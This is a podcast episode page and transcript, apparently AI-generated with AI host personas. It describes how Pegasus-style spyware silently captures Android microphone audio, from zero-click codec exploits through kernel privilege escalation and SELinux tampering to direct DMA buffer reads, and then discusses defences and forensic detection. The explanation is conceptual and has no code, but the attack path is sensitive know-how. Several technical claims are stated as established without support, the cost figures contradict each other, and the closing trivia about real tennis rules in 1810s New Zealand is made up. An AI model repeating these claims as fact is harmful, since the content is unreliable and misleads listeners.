#2696: How Pegasus Silently Hijacks Your Phone's Microphone

How NSO's Pegasus achieves silent mic access on Android through zero-click exploits, kernel privilege escalation, and DMA buffer reading.

Featuring

Listen

0:00

Episode Details

Episode ID: MWP-2857
Published: May 7
Duration: 28:10
Audio: Direct link
Pipeline: V5
TTS Engine: chatterbox-regular
Script Writing Agent: deepseek-v4-pro
Topics: espionage cybersecurity surveillance-technology

AI-Generated Content: This podcast is created using AI personas. Please verify any important information independently.

Pegasus doesn't need you to click a link. The zero-click delivery exploits—like FORCEDENTRY on iOS or the WhatsApp codec vulnerabilities on Android—process attack payloads before the user even sees a notification. On Android, the attack typically arrives as a malformed message during call setup. The vulnerability lives in the media codec, not the app's UI. A single malformed video frame triggers a heap overflow, giving attackers control over memory layout. The first stage leaks memory addresses to defeat ASLR; the second stage hijacks execution flow inside the messaging app process.

From there, the spyware needs local privilege escalation to reach the kernel. These LPEs target vendor-specific drivers from Qualcomm, MediaTek, and ARM—not core Linux. CVE-2020-11261 (a use-after-free in Qualcomm's video driver) and ARM Mali GPU vulnerabilities have all been exploited in the wild. Once in the kernel, the permission model becomes irrelevant. The kernel enforces permissions—if you control the kernel, you control the enforcer.

For microphone access, Pegasus bypasses the entire Android audio stack. Instead of going through AudioFlinger (which would trigger the green privacy dot), it memory-maps the audio hardware's DMA buffers. The phone's ADC is always running, writing samples to a circular buffer for wake-word detection. Pegasus reads that buffer directly, at a level below the audio HAL, leaving no syscall to intercept, no permission check, and no log entry. SELinux doesn't help either—kernel-level access can flip the enforcing bit or modify the policy in memory. Detection tools like MicSnitch monitor the standard audio APIs, but they're watching the front door while the attacker comes through the floor.

Downloads

Episode Audio

Download the full episode as an MP3 file

Download MP3

Transcript (TXT)

Plain text transcript file

Transcript (PDF)

Formatted PDF with styling

#2696: How Pegasus Silently Hijacks Your Phone's Microphone

Daniel sent us this one — he wants a deep dive on Pegasus, specifically the microphone side. He's done the right things: permission audits, watching for those little orange and green indicator dots, using MicSnitch-style monitors. But against zero-click spyware, none of that helps. He's asking us to walk through the actual mechanics — how Pegasus achieves silent mic access on Android, from the zero-click delivery vector through kernel privilege escalation, hiding from the permission model, why the indicator dot never fires, and whether anything at the user layer can actually detect or stop it.

Oh, this is the good stuff. The genuinely upsetting stuff, but the good stuff. And look, before we wade in — DeepSeek V4 Pro is writing today's script, so if anything comes out especially coherent, that's why.

So where do we start with this? Because I think most people's mental model of phone security is "I didn't click anything, so I'm fine" — and that's exactly the assumption Pegasus exploits.

That's the core of it. The delivery vector is the first thing that breaks people's brains. Pegasus doesn't need you to click a link. The most infamous vector was the FORCEDENTRY exploit — that was the one Citizen Lab and Amnesty documented back in twenty twenty-one, targeting iMessage. But on Android, the equivalent was a series of exploits chained together through what's called zero-click delivery.

Zero-click meaning the phone processes the attack payload before the user even sees a notification.

And the delivery mechanisms have evolved. The route we know about with most confidence on Android involves instant messaging apps — WhatsApp was a big one, but also Signal in some cases, though Signal's tighter codebase made it harder. The attack typically arrives as a malformed message, often during the call setup phase. On WhatsApp, the app would receive an inbound video call, and before the phone even rang, the media codec was already processing the incoming data stream.

The vulnerability is in the codec. Not the app's UI layer, not something you can avoid by not answering.

And here's the key detail — WhatsApp uses a library called libwhatsapp, which bundles its own implementation of video and audio codecs. In the case of the exploit chain documented around twenty nineteen and twenty twenty, the vulnerability was in the way the video decoder handled specific malformed frames. One frame would trigger a heap overflow, which gave the attacker control over memory layout.

Heap overflow — meaning they're writing data past the allocated buffer, overwriting adjacent memory, and from there they can start manipulating what the CPU runs.

And the clever part is that modern phones use ASLR — address space layout randomization — so the attacker doesn't know where anything is in memory. So step one is an information leak. The first stage of the exploit chain would leak memory addresses, defeat ASLR, and then the second stage would use the heap overflow to actually hijack execution flow. All of this happens inside the WhatsApp process, which runs as a regular user application. At this point, they've got code execution, but only with the permissions of WhatsApp — which on Android, post the storage scoping changes, isn't that much.

They've landed on the beach, but they're still stuck at the user level. Now they need to get to the kernel.

That's where the privilege escalation chain starts. And this is what separates commercial-grade spyware from the stuff you find on malware forums. NSO Group, and similar outfits like Intellexa with their Predator spyware, they chain multiple exploits. After the initial remote code execution in the messaging app, they need a local privilege escalation — an LPE — to get root.

These LPEs are vulnerabilities in the kernel itself.

In the kernel, or in kernel drivers. Android's Linux kernel has a massive attack surface because of all the vendor-specific drivers. Qualcomm, MediaTek, Samsung's Exynos — each of these chipset vendors maintains their own kernel modules, and historically, the code quality in those drivers is much worse than in the mainline Linux kernel.

The exploit writer isn't necessarily going after core Linux — they're going after some obscure Qualcomm GPU driver or a MediaTek power management interface.

And we've seen this in the wild. There was a Qualcomm vulnerability tracked as CVE twenty twenty dash one one two six one — that's a use-after-free in the Qualcomm video driver — and that was actively exploited in the wild. More recently, there was a whole cluster of ARM Mali GPU vulnerabilities that Google's Threat Analysis Group documented being used in exploit chains. The pattern is consistent: find a driver that has direct memory access, find the bug, exploit it to overwrite kernel memory, and then you can do anything.

Once you're in the kernel, the permission model is irrelevant. The kernel doesn't ask for microphone permission. The kernel is what enforces the permission model — so if you control the kernel, you control the enforcer.

That's the fundamental asymmetry. Android's permission system is built on the assumption that the kernel is trustworthy. The kernel mediates every syscall, every hardware access. If an app wants to open the microphone, it has to go through the AudioFlinger service, which talks to the audio HAL, which talks to the kernel driver — and at each step, the permission model checks whether the calling process has the RECORD_AUDIO permission. But if you're already in the kernel, you bypass that entire stack.

Let's walk through that stack, because this is where Daniel's question about the indicator dot gets interesting. On a modern Android phone, when an app accesses the microphone, the system shows a green dot in the status bar. What's actually triggering that dot?

The indicator is driven by the Privacy Indicators API, which was introduced in Android twelve. The way it works is that the audio service — AudioFlinger — tracks which process has an active audio recording session. When a process calls AudioRecord and starts capturing, AudioFlinger notifies the system UI, and the system UI draws the green dot.

If you're going through AudioFlinger, the dot appears. But Pegasus isn't going through AudioFlinger.

Once you have kernel-level access, you can interact with the audio hardware directly. The audio hardware on a modern phone is connected through the I2S bus or SoundWire interface, and it's controlled through the ALSA framework — the Advanced Linux Sound Architecture. The kernel exposes ALSA devices, and the audio HAL — the Hardware Abstraction Layer — talks to those devices.

Normally, the flow is: app requests microphone, AudioFlinger checks permissions, AudioFlinger talks to audio HAL, audio HAL writes to ALSA device node, kernel driver actually configures the hardware. Each step has logging, each step has permission checks.

And Pegasus, running at the kernel level, can simply... not do any of that. It can load a kernel module that talks directly to the ALSA device. Or even more directly, it can memory-map the audio hardware's DMA buffers and read the microphone data straight from the buffer without any intermediate software layer being involved at all.

The audio data is already being written to memory by the audio hardware's DMA engine — the hardware is constantly doing this because the phone is always listening for "hey Google" or whatever wake word — and Pegasus just reads that memory region.

That's the cleanest approach, and there's evidence that this is exactly what commercial spyware does. The microphone on a modern phone isn't simply "on" or "off" — the analog-to-digital converter is always running, always writing samples to a circular buffer. The only question is whether software reads that buffer.

If you're in the kernel, you can read it silently.

Not only can you read it silently — you can read it in a way that leaves almost no trace. The kernel has access to all physical memory. There's no syscall to intercept, no permission to check, no log entry generated. The audio HAL has no idea anyone else is reading the buffer because the read is happening at a level below the HAL.

Let me make sure I'm tracking the full chain. Step one: zero-click delivery through a messaging app, exploiting a codec vulnerability to get user-level code execution. Step two: local privilege escalation through a kernel driver vulnerability to get root. Step three: load a kernel module or memory-map the audio DMA buffer to read microphone data directly, bypassing AudioFlinger, bypassing the HAL, bypassing the permission model, bypassing the privacy indicator.

That's the chain. And step three is almost elegant in its simplicity once you have the first two. The hard part is steps one and two — those are the million-dollar exploits. But once you're root, the microphone is just another peripheral.

What about SELinux? That's supposed to be the last line of defense — even if you get root, SELinux should constrain what a root process can do.

This is where it gets even more upsetting. SELinux on Android is deployed in enforcing mode, and it's effective against a lot of attack paths. The problem is that once you're in the kernel, you can disable SELinux. Or more subtly, you can modify the SELinux policy in memory. The kernel stores the policy data structures, and if you have kernel write access, you can flip the enforcing bit or add allow rules that let your process do whatever it wants.

There's no user-visible indication that SELinux has been modified.

There have been exploits that specifically target the SELinux policy database in memory. The policy is loaded from a file at boot, but once it's in memory, it's just data structures. The NSA's original SELinux design assumed a trustworthy kernel — the architecture was designed to constrain userspace, not to defend against a compromised kernel.

The chain is actually four steps now. Delivery, privilege escalation, SELinux bypass, then silent microphone access.

Yes, though the SELinux bypass is often part of the privilege escalation step — the same kernel write primitive that gets you root also lets you neuter SELinux.

I want to dig into something Daniel mentioned — MicSnitch-style monitors. These are apps that claim to detect when the microphone is being accessed without authorization. How do they work, and why do they fail?

MicSnitch and similar tools work by monitoring the same APIs that the privacy indicator uses. They poll AudioFlinger or monitor the audio session list to see which processes have active recording sessions. Some of them also monitor the audio routing — checking whether the microphone input is being routed to any application. A few of the more sophisticated ones monitor system logs for audio-related events.

All of those depend on the spyware using the standard audio stack.

They're monitoring the front door while the attacker is coming through the floor. If Pegasus is reading the DMA buffer directly, none of those APIs will show any activity. There is no recording session to detect, no audio routing to observe, no log entry to trigger on.

Could a monitor detect the kernel module itself? Look for suspicious kernel modules loaded?

In theory, yes. On a rooted phone, you could look at the list of loaded kernel modules and check for anything unexpected. But there are two problems. First, most users don't have root access to their own phones, so they can't see the module list. And second, the spyware doesn't necessarily load a persistent module — it can inject code directly into the running kernel without creating a visible module entry. Techniques like kernel function hooking or modifying the system call table don't require loading a module at all.

The attacker overwrites the syscall table to redirect, say, the read syscall to their own code, which can then exfiltrate audio data.

That's one approach. Another is to hook into the kernel's networking stack — intercept outgoing packets, inject audio data into what looks like normal traffic. If you're already in the kernel, you can make the exfiltration look like regular app traffic from a legitimate process.

Let me ask a question that might be uncomfortable. Given all of this — the zero-click delivery, the kernel exploitation, the DMA buffer access — is there anything a user can actually do? Daniel asked whether anything at the user layer can meaningfully detect or stop this, and my instinct is that the answer is basically no.

Your instinct is correct, and I want to be really clear about this because it's important. Against a well-resourced attacker deploying a full zero-click chain with kernel escalation, the user is effectively defenseless. You cannot permission-audit your way out of this. You cannot indicator-dot your way out of this. You cannot app-permission your way out of this.

That's bleak.

It is bleak, but let me add some nuance because "nothing works" isn't quite right. There are things that raise the cost for the attacker. There are things that make exploitation harder. And there are detection approaches that work post-compromise, even if they don't work in real time.

Okay, let's go through those. What raises the cost?

First, keeping your phone updated. I know that sounds basic, but a lot of the LPEs used in these chains target known vulnerabilities that have patches available. The gap between a patch being released and an exploit chain incorporating a new, unknown vulnerability is significant. If you're on a phone that gets monthly security updates and you apply them promptly, you're forcing the attacker to burn more zero-days on you specifically.

Which matters if you're a high-value target, but for most people, the attacker isn't burning zero-days on random individuals.

Pegasus is a targeted spyware platform — it's not mass malware. It's sold to governments, and each deployment costs millions of dollars. The targets are journalists, activists, diplomats, political opponents. If you're not in that category, your threat model probably doesn't include Pegasus specifically.

Daniel's question is about the mechanics, and the mechanics are the same whether it's Pegasus or a cheaper clone. The Predator spyware from Intellexa uses similar techniques. So does the stuff from Candiru and other mercenary spyware vendors. The techniques trickle down.

And that's why understanding the mechanics matters. The second thing that raises the cost is using a phone with a stronger security architecture. Google's Pixel line with the Titan M security chip, or iPhones with the Secure Enclave — these have hardware-backed integrity verification that makes kernel tampering harder to hide.

Harder, but not impossible.

Not impossible, no. But the Titan M chip, for example, can verify the boot chain and detect if the kernel has been modified. If the spyware tries to persist across reboots by modifying the system partition, the verified boot will catch that on next startup.

If the spyware is memory-only — if it re-infects on every boot by waiting for the user to receive another malicious message — then verified boot doesn't help.

And that's exactly what sophisticated implants do. They don't persist on disk. They live in memory, they exfiltrate data, and when the phone reboots, they're gone. The attacker just sends another exploit payload when they want to re-establish access.

Persistence is optional for a targeted implant. That's a key point that a lot of security advice misses. People think "I'll reboot my phone and the malware will be gone" — and that's true, but it doesn't matter if the attacker can re-exploit you silently.

And the re-exploitation can use the same zero-click vector. The attacker just sends another malformed WhatsApp call or whatever the initial vector was. The phone processes it, the exploit fires, and they're back in — all without the user seeing anything.

What about detection? You mentioned post-compromise detection approaches.

There are a few things that can work, though none of them are consumer-friendly. One is network traffic analysis. Pegasus has to exfiltrate audio data somewhere, and that means network traffic. If you're monitoring your phone's network traffic at the router level, you might see anomalous patterns — connections to unusual IP addresses, data being sent at odd hours, traffic volumes that don't match what you're actively doing on the phone.

That requires technical sophistication and infrastructure that most people don't have. And the spyware can use domain fronting or other techniques to hide its command and control traffic inside legitimate-looking connections.

Domain fronting, or just piggybacking on Google Cloud or Amazon Web Services IP ranges that are already whitelisted by corporate networks. The attribution gets hard fast.

Another detection approach: mobile device management or endpoint detection and response tools. The kind of thing you'd see on a corporate device.

Yes, and this is actually where some of the interesting work is happening. Tools like iVerify's mobile EDR or the Amnesty International Mobile Verification Toolkit — MVT — can look for indicators of compromise. MVT in particular was developed specifically to detect Pegasus infections by analyzing phone backups for known forensic artifacts.

How does that work? What artifacts does Pegasus leave behind?

It depends on the version and the platform, but on iOS, the early Pegasus versions left traces in the SMS database, in the data usage logs, and in various system diagnostic files. On Android, MVT looks for suspicious packages, unusual process entries, and known malicious file paths. The challenge is that the more recent versions of Pegasus are much better at covering their tracks — they clean up log entries, they avoid writing to disk, they minimize forensic artifacts.

The detection tools are always playing catch-up with the spyware's anti-forensic capabilities.

And that's the fundamental asymmetry in this space. The attacker has the initiative — they choose when to deploy, what techniques to use, how to hide. The defender is stuck looking for traces that the attacker is actively trying to eliminate.

Let me circle back to something you mentioned earlier about the audio DMA buffer. I want to understand this more concretely. On a modern Android phone, the microphone is connected to an audio codec chip, which has an ADC — analog-to-digital converter — that's constantly sampling. That digital audio data gets written to a memory region via DMA. Who allocates that buffer normally?

The audio driver in the kernel allocates it during initialization. When the audio subsystem starts up, the ALSA driver allocates DMA buffers for each audio interface — playback and capture. These are physically contiguous memory regions that the audio hardware can write to directly without CPU involvement.

The audio HAL then maps those buffers into userspace when an app requests audio capture.

The HAL uses the ALSA interface to get a pointer to the DMA buffer, and then it shares that with the AudioFlinger service, which shares it with the requesting app. But here's the thing — the buffer exists in kernel memory regardless of whether any app is accessing it. The audio hardware is always writing to it. The only difference is whether anyone reads it.

Pegasus, running in the kernel, just needs to find the physical address of that DMA buffer and read from it. No HAL involvement, no userspace involvement, no indicator.

And finding the physical address is trivial if you're already in the kernel — you can just walk the kernel's device tree or look at the ALSA driver's data structures. The buffer address is stored in a well-known location.

That's almost insultingly simple once you have kernel access.

It really is. The hard parts are getting into the kernel in the first place and then getting the audio data out without being detected. The audio capture itself is almost an afterthought.

The exfiltration — how does the audio data actually leave the phone? We talked about kernel-level network hooks, but what does that look like in practice?

The spyware can register a network protocol handler in the kernel that intercepts outgoing packets. When an app — any app — sends data over the network, the handler can modify the packet to include encoded audio data. Or it can create its own network connections using kernel sockets, which bypass any userspace firewall or VPN.

Even if you're running a VPN to monitor your traffic, the spyware's kernel-level connections don't go through the VPN.

The VPN operates at the network layer in userspace. Kernel sockets can send packets directly to the network interface without ever traversing the VPN tunnel. This is a well-known limitation of VPN-based security on compromised devices.

What about airplane mode? If the phone is in airplane mode, the modem is off — can the spyware still exfiltrate?

Airplane mode actually does help, because it cuts off the exfiltration path. The spyware can still record — it can buffer audio in memory — but it can't send it anywhere until the network comes back. The problem is that nobody keeps their phone in airplane mode permanently.

The spyware can just buffer and wait.

And modern phones have gigabytes of RAM. You can buffer hours of compressed audio without breaking a sweat.

Let me try to summarize the defensive picture for Daniel, because I think this is what he's ultimately asking. Against a zero-click, kernel-level implant targeting the microphone: permission audits do nothing, indicator dots do nothing, MicSnitch-style monitors do nothing, VPNs don't stop exfiltration. The things that help, marginally, are keeping the phone updated to force the attacker to burn more zero-days, using a phone with hardware-backed verified boot to make persistence harder, rebooting regularly to clear memory-only implants, and using forensic tools like MVT to detect infections after the fact.

That's a fair summary. And I'd add: if you're concerned about this class of threat, you need to think beyond the phone itself. The phone is a compromised platform by default against this level of adversary. The mitigation is operational security — don't have sensitive conversations near a powered-on phone, regardless of what permissions you've configured.

Which is a fairly extreme measure, but it's the only thing that actually works against an implant that has kernel-level access to the microphone hardware.

It's the air gap principle applied to audio. If the microphone is physically connected to a compromised system, you have to assume the adversary can access it. The only way to be certain is to break the physical connection — either by powering off the device, or by being in a different room.

There's one thing I want to push on before we wrap up. You mentioned that Pegasus is targeted — it's sold to governments, it's expensive, it's used against specific individuals. But we're also seeing a broader ecosystem of commercial spyware. Intellexa's Predator, Candiru's tools, the various "lawful intercept" platforms. And the techniques we've described — zero-click delivery, kernel exploitation, silent hardware access — those are becoming more widely available as the exploit broker market grows.

The exploit broker market is a huge part of this story. Companies like Zerodium and Crowdfence pay bounties for zero-day exploits and then resell them to spyware vendors and governments. A reliable zero-click chain for Android can sell for two to three million dollars. That market incentivizes the discovery and weaponization of exactly the kinds of vulnerabilities we've been discussing.

The supply chain for these exploits is professionalized. It's not a handful of hackers in a basement — it's an industry.

It's an industry with its own conferences, its own sales pipelines, its own customer relationships. The NSO Group has hundreds of employees. They have HR departments and holiday parties. This is institutionalized.

Which means the techniques are going to improve, not stagnate. The anti-forensic capabilities will get better. The kernel exploits will target newer chips. The delivery vectors will diversify.

That's why understanding the mechanics matters. Because the specific vulnerabilities change — FORCEDENTRY gets patched, new ones get discovered — but the architecture of the attack stays the same. Zero-click delivery, privilege escalation, kernel-level hardware access, silent exfiltration. That pattern isn't going anywhere.

The answer to Daniel's question — "can anything at the user layer meaningfully detect or stop this" — is essentially no, with the caveat that operational measures like powering off the device during sensitive conversations actually work.

And I want to be careful not to create fatalism here. For most people, the practical threat from Pegasus-class spyware is very low. These are six-figure-per-target tools. But for the people who are targeted — journalists, lawyers, activists, diplomats — understanding the actual mechanics is important because it tells you which defenses are theater and which ones actually constrain the adversary.

The permission model is theater against this threat. The indicator dots are theater. MicSnitch is theater. What's real is the hardware security architecture, the patch level, and physical separation.

That's the bottom line. And it's an uncomfortable one because it means that a lot of the privacy features that phone manufacturers market heavily are irrelevant against the most sophisticated adversaries.

Let's land this thing.

Now: Hilbert's daily fun fact.

Hilbert: In the eighteen-tens, the rules of real tennis — the original indoor racket sport from which lawn tennis descended — were formalized in a single handwritten manuscript by one Robert Mackay, a Scottish merchant living on New Zealand's South Island. That manuscript remains the only known surviving copy of the sport's rules from that era, preserved because it was tucked inside a family Bible for over a century.

...Robert Mackay. Scottish merchant. New Zealand. Real tennis rules. Okay.

This has been My Weird Prompts. Thanks to our producer Hilbert Flumingtop, thanks to Daniel for the question, and thanks to everyone listening. You can find us at myweirdprompts dot com or wherever you get your podcasts.

If you have a question you want us to dig into, send it our way. We'll see you next time.

This episode was generated with AI assistance. Hosts Herman and Corn are AI personalities.

#2696: How Pegasus Silently Hijacks Your Phone's Microphone

Downloads

You Might Also Like

#2696: How Pegasus Silently Hijacks Your Phone's Microphone